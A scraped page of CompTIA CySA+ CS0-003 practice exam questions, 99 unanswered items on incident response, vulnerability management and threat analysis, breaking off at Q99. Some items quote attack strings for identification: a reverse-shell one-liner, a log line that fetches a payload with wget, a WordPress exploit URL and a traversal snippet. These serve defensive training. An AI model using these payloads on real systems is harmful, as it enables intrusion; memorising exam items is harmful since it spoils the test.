Special Summer Sale Limited Time Flat 70% Discount offer - Ends in 0d 00h 00m 00s - Coupon code: 70spcl

CompTIA CS0-003 CompTIA CyberSecurity Analyst CySA+ Certification Exam Exam Practice Test

Page: 1 / 42
Total 424 questions

CompTIA CyberSecurity Analyst CySA+ Certification Exam Questions and Answers

Question 1

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:

Security Policy 1006: Vulnerability Management

1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.

2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.

3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.

According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A)

Question # 1

B)

Question # 1

C)

Question # 1

D)

Question # 1

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Question 2

A company brings in a consultant to make improvements to its website. After the consultant leaves. a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team:

Question # 2

Which of the following did the consultant do?

Options:

A.

Implanted a backdoor

B.

Implemented privilege escalation

C.

Implemented clickjacking

D.

Patched the web server

Question 3

During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?

Options:

A.

Header analysis

B.

Packet capture

C.

SSL inspection

D.

Reverse engineering

Question 4

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

Question # 4

Which of the following has most likely occurred?

Options:

A.

An Office document with a malicious macro was opened.

B.

A credential-stealing website was visited.

C.

A phishing link in an email was clicked

D.

A web browser vulnerability was exploited.

Question 5

A security analyst must preserve a system hard drive that was involved in a litigation request Which of the following is the best method to ensure the data on the device is not modified?

Options:

A.

Generate a hash value and make a backup image.

B.

Encrypt the device to ensure confidentiality of the data.

C.

Protect the device with a complex password.

D.

Perform a memory scan dump to collect residual data.

Question 6

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes

does this describe?

Options:

A.

Business continuity plan

B.

Lessons learned

C.

Forensic analysis

D.

Incident response plan

Question 7

A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:

Question # 7

Which of the following vulnerabilitles Is the securlty analyst trylng to valldate?

Options:

A.

SQL injection

B.

LFI

C.

XSS

D.

CSRF

Question 8

While reviewing web server logs, a security analyst discovers the following suspicious line:

Question # 8

Which of the following is being attempted?

Options:

A.

Remote file inclusion

B.

Command injection

C.

Server-side request forgery

D.

Reverse shell

Question 9

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following

does this most likely describe?

Options:

A.

System hardening

B.

Hybrid network architecture

C.

Continuous authorization

D.

Secure access service edge

Question 10

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:

Question # 10

Which of the following vulnerability types is the security analyst validating?

Options:

A.

Directory traversal

B.

XSS

C.

XXE

D.

SSRF

Question 11

A security administrator needs to import Pll data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?

Options:

A.

Data masking

B.

Hashing

C.

Watermarking

D.

Encoding

Question 12

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:

• DNS traffic while a tunneling session is active.

• The mean time between queries is less than one second.

• The average query length exceeds 100 characters.

Which of the following attacks most likely occurred?

Options:

A.

DNS exfiltration

B.

DNS spoofing

C.

DNS zone transfer

D.

DNS poisoning

Question 13

The security team at a company, which was a recent target of ransomware, compiled a list of hosts that were identified as impacted and in scope for this incident. Based on the following host list:

Question # 13

Which of the following systems was most pivotal to the threat actor in its distribution of the encryption binary via Group Policy?

Options:

A.

SQL01

B.

WK10-Sales07

C.

WK7-Plant01

D.

DCEast01

E.

HQAdmin9

Question 14

An analyst has discovered the following suspicious command:

Question # 14

Which of the following would best describe the outcome of the command?

Options:

A.

Cross-site scripting

B.

Reverse shell

C.

Backdoor attempt

D.

Logic bomb

Question 15

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:

Question # 15

Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?

Options:

A.

Vulnerability A

B.

Vulnerability B

C.

Vulnerability C

D.

Vulnerability D

Question 16

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

Options:

A.

Credentialed network scanning

B.

Passive scanning

C.

Agent-based scanning

D.

Dynamic scanning

Question 17

Which of the following would likely be used to update a dashboard that integrates…..

Options:

A.

Webhooks

B.

Extensible Markup Language

C.

Threat feed combination

D.

JavaScript Object Notation

Question 18

A systems administrator needs to gather security events with repeatable patterns from Linux log files. Which of the following would the administrator most likely use for this task?

Options:

A.

A regular expression in Bash

B.

Filters in the vi editor

C.

Variables in a PowerShell script

D.

A playbook in a SOAR tool

Question 19

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to

reduce risks associated with the application development?

Options:

A.

Perform static analyses using an integrated development environment.

B.

Deploy compensating controls into the environment.

C.

Implement server-side logging and automatic updates.

D.

Conduct regular code reviews using OWASP best practices.

Question 20

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

Options:

A.

Offline storage

B.

Evidence collection

C.

Integrity validation

D.

Legal hold

Question 21

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two).

Options:

A.

Drop the tables on the database server to prevent data exfiltration.

B.

Deploy EDR on the web server and the database server to reduce the adversaries capabilities.

C.

Stop the httpd service on the web server so that the adversary can not use web exploits

D.

use micro segmentation to restrict connectivity to/from the web and database servers.

E.

Comment out the HTTP account in the / etc/passwd file of the web server

F.

Move the database from the database server to the web server.

Question 22

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

Options:

A.

Geoblock the offending source country

B.

Block the IP range of the scans at the network firewall.

C.

Perform a historical trend analysis and look for similar scanning activity.

D.

Block the specific IP address of the scans at the network firewall

Question 23

A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

Options:

A.

XSS

B.

CSRF

C.

SSRF

D.

RCE

Question 24

An organization's email account was compromised by a bad actor. Given the following Information:

Which of the following is the length of time the team took to detect the threat?

Options:

A.

25 minutes

B.

40 minutes

C.

45 minutes

D.

2 hours

Question 25

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)

Options:

A.

Beaconinq

B.

Domain Name System hijacking

C.

Social engineering attack

D.

On-path attack

E.

Obfuscated links

F.

Address Resolution Protocol poisoning

Question 26

An XSS vulnerability was reported on one of the public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two).

Options:

A.

Implement an IPS in front of the web server.

B.

Enable MFA on the website.

C.

Take the website offline until it is patched.

D.

Implement a compensating control in the source code.

E.

Configure TLS v1.3 on the website.

F.

Fix the vulnerability using a virtual patch at the WAF.

Question 27

An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution for the organization to use to eliminate the need for multiple authentication credentials?

Options:

A.

API

B.

MFA

C.

SSO

D.

VPN

Question 28

A company classifies security groups by risk level. Any group with a high-risk classification requires multiple levels of approval for member or owner changes. Which of the following inhibitors to remediation is the company utilizing?

Options:

A.

Organizational governance

B.

MOU

C.

SLA

D.

Business process interruption

Question 29

A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following

would be missing from a scan performed with this configuration?

Options:

A.

Operating system version

B.

Registry key values

C.

Open ports

D.

IP address

Question 30

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

Options:

A.

Determine the sophistication of the audience that the report is meant for

B.

Include references and sources of information on the first page

C.

Include a table of contents outlining the entire report

D.

Decide on the color scheme that will effectively communicate the metrics

Question 31

The security analyst received the monthly vulnerability report. The following findings were included in the report

• Five of the systems only required a reboot to finalize the patch application.

• Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

Options:

A.

Compensating controls

B.

Due diligence

C.

Maintenance windows

D.

Passive discovery

Question 32

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Question # 32

Which of the following tuning recommendations should the security analyst share?

Options:

A.

Set an HttpOnlvflaq to force communication by HTTPS

B.

Block requests without an X-Frame-Options header

C.

Configure an Access-Control-Allow-Origin header to authorized domains

D.

Disable the cross-origin resource sharing header

Question 33

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PH data. Which of the following is the best reason for developing the organization's communication plans?

Options:

A.

For the organization's public relations department to have a standard notification

B.

To ensure incidents are immediately reported to a regulatory agency

C.

To automate the notification to customers who were impacted by the breach

D.

To have approval from executive leadership on when communication should occur

Question 34

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

Options:

A.

Log retention

B.

Log rotation

C.

Maximum log size

D.

Threshold value

Question 35

An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?

Options:

A.

OpenVAS

B.

Angry IP Scanner

C.

Wireshark

D.

Maltego

Question 36

Which of the following does "federation" most likely refer to within the context of identity and access management?

Options:

A.

Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access

B.

An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains

C.

Utilizing a combination of what you know, who you are, and what you have to grant authentication to a user

D.

Correlating one's identity with the attributes and associated applications the user has access to

Question 37

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?

Options:

A.

It provides a structured way to gain information about insider threats.

B.

It proactively facilitates real-time information sharing between the public and private sectors.

C.

It exchanges messages in the most cost-effective way and requires little maintenance once implemented.

D.

It is a semi-automated solution to gather threat intellbgence about competitors in the same sector.

Question 38

A Chief Information Security Officer (CISO) has determined through lessons learned and an associated after-action report that staff members who use legacy applications do not adequately understand how to differentiate between non-malicious emails and phishing emails. Which of the following should the CISO include in an action plan to remediate this issue?

Options:

A.

Awareness training and education

B.

Replacement of legacy applications

C.

Organizational governance

D.

Multifactor authentication on all systems

Question 39

A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?

Options:

A.

AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0

B.

AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:L/A:L - Base Score 7.2

C.

AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4

D.

AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

Question 40

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

Options:

A.

Limit user creation to administrators only.

B.

Limit layout creation to administrators only.

C.

Set the directory trx_addons to read only for all users.

D.

Set the directory v2 to read only for all users.

Question 41

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

Options:

A.

Create a timeline of events detailinq the date stamps, user account hostname and IP information associated with the activities

B.

Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation

C.

Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identity the case as an HR-related investigation

D.

Notify the SOC manager for awareness after confirmation that the activity was intentional

Question 42

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

Options:

A.

RCE

B.

Reverse shell

C.

XSS

D.

SQL injection

Question 43

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

Options:

A.

Implement segmentation with ACLs.

B.

Configure logging and monitoring to the SIEM.

C.

Deploy MFA to cloud storage locations.

D.

Roll out an IDS.

Question 44

The DevSecOps team is remediating a Server-Side Request Forgery (SSRF) issue on the company's public-facing website. Which of the following is the best mitigation technique to address this issue?

Options:

A.

Place a Web Application Firewall (WAF) in front of the web server.

B.

Install a Cloud Access Security Broker (CASB) in front of the web server.

C.

Put a forward proxy in front of the web server.

D.

Implement MFA in front of the web server.

Question 45

Which of the following is a nation-state actor least likely to be concerned with?

Options:

A.

Detection by MITRE ATT&CK framework.

B.

Detection or prevention of reconnaissance activities.

C.

Examination of its actions and objectives.

D.

Forensic analysis for legal action of the actions taken

Question 46

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

Options:

A.

External

B.

Agent-based

C.

Non-credentialed

D.

Credentialed

Question 47

Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below:

Question # 47

Which of the following should the security analyst prioritize for remediation?

Options:

A.

rogers

B.

brady

C.

brees

D.

manning

Question 48

During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee's

personal email. Which of the following should the analyst recommend be done first?

Options:

A.

Place a legal hold on the employee's mailbox.

B.

Enable filtering on the web proxy.

C.

Disable the public email access with CASB.

D.

Configure a deny rule on the firewall.

Question 49

A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?

Options:

A.

A vulnerability that has related threats and loCs, targeting a different industry

B.

A vulnerability that is related to a specific adversary campaign, with loCs found in the SIEM

C.

A vulnerability that has no adversaries using it or associated loCs

D.

A vulnerability that is related to an isolated system, with no loCs

Question 50

After updating the email client to the latest patch, only about 15% of the workforce is able to use email. Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the

following did the change management team fail to do?

Options:

A.

Implementation

B.

Testing

C.

Rollback

D.

Validation

Question 51

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

Options:

A.

Information sharing organization

B.

Blogs/forums

C.

Cybersecuritv incident response team

D.

Deep/dark web

Question 52

A security analyst is conducting a vulnerability assessment of a company's online store. The analyst discovers a critical vulnerability in the payment processing system that could be exploited, allowing attackers to steal customer payment information. Which of the following should the analyst do next?

Options:

A.

Leave the vulnerability unpatched until the next scheduled maintenance window to avoid potential disruption to business.

B.

Perform a risk assessment to evaluate the potential impact of the vulnerability and determine whether additional security measures are needed.

C.

Ignore the vulnerability since the company recently passed a payment system compliance audit.

D.

Isolate the payment processing system from production and schedule for reimaging.

Question 53

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Select two).

Options:

A.

Hostname

B.

Missing KPI

C.

CVE details

D.

POC availability

E.

loCs

F.

npm identifier

Question 54

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

Options:

A.

Eradication

B.

Recovery

C.

Containment

D.

Preparation

Question 55

Which of the following can be used to learn more about TTPs used by cybercriminals?

Options:

A.

ZenMAP

B.

MITRE ATT&CK

C.

National Institute of Standards and Technology

D.

theHarvester

Question 56

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

Options:

A.

The finding is a false positive and should be ignored.

B.

A rollback had been executed on the instance.

C.

The vulnerability scanner was configured without credentials.

D.

The vulnerability management software needs to be updated.

Question 57

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Options:

A.

TO provide metrics and test continuity controls

B.

To verify the roles of the incident response team

C.

To provide recommendations for handling vulnerabilities

D.

To perform tests against implemented security controls

Question 58

An analyst is reviewing a dashboard from the company’s SIEM and finds that an IP address known to be malicious can be tracked to numerous high-priority events in the last two hours. The dashboard indicates that these events relate to TTPs. Which of the following is the analyst most likely using?

Options:

A.

MITRE ATT&CK

B.

OSSTMM

C.

Diamond Model of Intrusion Analysis

D.

OWASP

Question 59

An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?

Options:

A.

Identify and discuss the lessons learned with the prior analyst.

B.

Accept all findings and continue to investigate the next item target.

C.

Review the steps that the previous analyst followed.

D.

Validate the root cause from the prior analyst.

Question 60

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:

Question # 60

Which of the following should be completed first to remediate the findings?

Options:

A.

Ask the web development team to update the page contents

B.

Add the IP address allow listing for control panel access

C.

Purchase an appropriate certificate from a trusted root CA

D.

Perform proper sanitization on all fields

Question 61

An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

Options:

A.

Access rights

B.

Network segmentation

C.

Time synchronization

D.

Invalid playbook

Question 62

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

• created the initial evidence log.

• disabled the wireless adapter on the device.

• interviewed the employee, who was unable to identify the website that was accessed

• reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

Options:

A.

Update the system firmware and reimage the hardware.

B.

Install an additional malware scanner that will send email alerts to the analyst.

C.

Configure the system to use a proxy server for Internet access.

D.

Delete the user profile and restore data from backup.

Question 63

A security analyst has identified outgoing network traffic leaving the enterprise at odd times. The traffic appears to pivot across network segments and target domain servers. The traffic is then routed to a geographic location to which the company has no association. Which of the following best describes this type of threat?

Options:

A.

Hacktivist

B.

Zombie

C.

Insider threat

D.

Nation-state actor

Question 64

Which of the following is the best use of automation in cybersecurity?

Options:

A.

Ensure faster incident detection, analysis, and response.

B.

Eliminate configuration errors when implementing new hardware.

C.

Lower costs by reducing the number of necessary staff.

D.

Reduce the time for internal user access requests.

Question 65

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

Options:

A.

A mean time to remediate of 30 days

B.

A mean time to detect of 45 days

C.

A mean time to respond of 15 days

D.

Third-party application testing

Question 66

A technician is analyzing output from a popular network mapping tool for a PCI audit:

Question # 66

Which of the following best describes the output?

Options:

A.

The host is not up or responding.

B.

The host is running excessive cipher suites.

C.

The host is allowing insecure cipher suites.

D.

The Secure Shell port on this host is closed

Question 67

A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?

Options:

A.

DNS

B.

tcpdump

C.

Directory

D.

IDS

Question 68

Given the following CVSS string-

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H

Which of the following attributes correctly describes this vulnerability?

Options:

A.

A user is required to exploit this vulnerability.

B.

The vulnerability is network based.

C.

The vulnerability does not affect confidentiality.

D.

The complexity to exploit the vulnerability is high.

Question 69

AXSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a company. The security department confirmed the finding and needs to provide a recommendation to the application owner. Which of the following recommendations will best prevent this vulnerability from being exploited? (Select two).

Options:

A.

Implement an IPS in front of the web server.

B.

Enable MFA on the website.

C.

Take the website offline until it is patched.

D.

Implement a compensating control in the source code.

E.

Configure TLS v1.3 on the website.

F.

Fix the vulnerability using a virtual patch at the WAF.

Question 70

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?

Options:

A.

Enabling a user account lockout after a limited number of failed attempts

B.

Installing a third-party remote access tool and disabling RDP on all devices

C.

Implementing a firewall block for the remote system's IP address

D.

Increasing the verbosity of log-on event auditing on all devices

Question 71

While reviewing the web server logs, a security analyst notices the following snippet:

.. \ .. / .. \ .. /boot.ini

Which of the following Is belng attempted?

Options:

A.

Directory traversal

B.

Remote file inclusion

C.

Cross-site scripting

D.

Remote code execution

E.

Enumeration of /etc/passwd

Question 72

Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?

Options:

A.

CASB

B.

DMARC

C.

SIEM

D.

PAM

Question 73

A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal?

Options:

A.

function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }

B.

B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }

C.

C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }

D.

function z() { c=$(geoiplookup$1) && echo “$1 | $c” }

Question 74

Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?

Options:

A.

Registry editing

B.

Network mapping

C.

Timeline analysis

D.

Write blocking

Question 75

A security audit for unsecured network services was conducted, and the following output was generated:

Question # 75

Which of the following services should the security team investigate further? (Select two).

Options:

A.

21

B.

22

C.

23

D.

636

E.

1723

F.

3389

Question 76

A SOC analyst observes reconnaissance activity from an IP address. The activity follows a pattern of short bursts toward a low number of targets. An open-source review shows that the IP has a bad reputation. The perimeter firewall logs indicate the inbound traffic was allowed. The destination hosts are high-value assets with EDR agents installed. Which of the following is the best action for the SOC to take to protect against any further activity from the source IP?

Options:

A.

Add the IP address to the EDR deny list.

B.

Create a SIEM signature to trigger on any activity from the source IP subnet detected by the web proxy or firewalls for immediate notification.

C.

Implement a prevention policy for the IP on the WAF

D.

Activate the scan signatures for the IP on the NGFWs.

Question 77

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Options:

A.

Create a backdoor root account named zsh.

B.

Execute commands through an unsecured service account.

C.

Send a beacon to a command-and-control server.

D.

Perform a denial-of-service attack on the web server.

Question 78

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware, based on its telemetry?

Options:

A.

Cross-reference the signature with open-source threat intelligence.

B.

Configure the EDR to perform a full scan.

C.

Transfer the malware to a sandbox environment.

D.

Log in to the affected systems and run necstat.

Question 79

Several incidents have occurred with a legacy web application that has had little development work completed. Which of the following is the most likely cause of the incidents?

Options:

A.

Misconfigured web application firewall

B.

Data integrity failure

C.

Outdated libraries

D.

Insufficient logging

Question 80

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.

SIEM ingestion logs are reduced by 20%.

B.

Phishing alerts drop by 20%.

C.

False positive rates drop to 20%.

D.

The MTTR decreases by 20%.

Question 81

Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?

Options:

A.

Containerization

B.

Manual code reviews

C.

Static and dynamic analysis

D.

Formal methods

Question 82

Which of the following is the best framework for assessing how attackers use techniques over an infrastructure to exploit a target’s information assets?

Options:

A.

Structured Threat Information Expression

B.

OWASP Testing Guide

C.

Open Source Security Testing Methodology Manual

D.

Diamond Model of Intrusion Analysis

Question 83

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?

Options:

A.

Increasing training and awareness for all staff

B.

Ensuring that malicious websites cannot be visited

C.

Blocking all scripts downloaded from the internet

D.

Disabling all staff members' ability to run downloaded applications

Question 84

Which of the following best explains the importance of communicating with staff regarding the official public communication plan related to incidents impacting the organization?

Options:

A.

To establish what information is allowed to be released by designated employees

B.

To designate an external public relations firm to represent the organization

C.

To ensure that all news media outlets are informed at the same time

D.

To define how each employee will be contacted after an event occurs

Question 85

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

Options:

A.

Implementing multifactor authentication on the server OS

B.

Hashing user passwords on the web application

C.

Performing input validation before allowing submission

D.

Segmenting the network between the users and the web server

Question 86

Which of the following is the best reason to implement an MOU?

Options:

A.

To create a business process for configuration management

B.

To allow internal departments to understand security responsibilities

C.

To allow an expectation process to be defined for legacy systems

D.

To ensure that all metrics on service levels are properly reported

Question 87

A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented to best mitigate the password attacks?

Options:

A.

Multifactor authentication

B.

Password complexity

C.

Web application firewall

D.

Lockout policy

Question 88

An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information?

Options:

A.

Upload the malware to the VirusTotal website

B.

Share the malware with the EDR provider

C.

Hire an external consultant to perform the analysis

D.

Use a local sandbox in a microsegmented environment

Question 89

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Question 90

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

Options:

A.

Disk contents

B.

Backup data

C.

Temporary files

D.

Running processes

Question 91

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

Options:

A.

Avoid

B.

Transfer

C.

Accept

D.

Mitigate

Question 92

During an internal code review, software called "ACE" was discovered to have a vulnerability that allows the execution of arbitrary code. The vulnerability is in a legacy, third-party vendor resource that is used by the ACE software. ACE is used worldwide and is essential for many businesses in this industry. Developers informed the Chief Information Security Officer that removal of the vulnerability will take time. Which of the following is the first action to take?

Options:

A.

Look for potential loCs in the company.

B.

Inform customers of the vulnerability.

C.

Remove the affected vendor resource from the ACE software.

D.

Develop a compensating control until the issue can be fixed permanently.

Question 93

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

Options:

A.

CIS Benchmarks

B.

PCI DSS

C.

OWASP Top Ten

D.

ISO 27001

Question 94

Several reports with sensitive information are being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

Options:

A.

Implement step-up authentication for administrators.

B.

Improve employee training and awareness.

C.

Increase password complexity standards.

D.

Deploy mobile device management.

Question 95

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being

used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

Options:

A.

Leave the proxy as is.

B.

Decomission the proxy.

C.

Migrate the proxy to the cloud.

D.

Patch the proxy

Question 96

Which of the following should be updated after a lessons-learned review?

Options:

A.

Disaster recovery plan

B.

Business continuity plan

C.

Tabletop exercise

D.

Incident response plan

Question 97

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

Options:

A.

SLA

B.

LOI

C.

MOU

D.

KPI

Question 98

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two).

Options:

A.

Performing dynamic application security testing

B.

Reviewing the code

C.

Fuzzing the application

D.

Debugging the code

E.

Implementing a coding standard

F.

Implementing IDS

Question 99

An organization discovered a data breach that resulted in Pll being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?

Options:

A.

Creating a playbook denoting specific SLAs and containment actions per incident type

B.

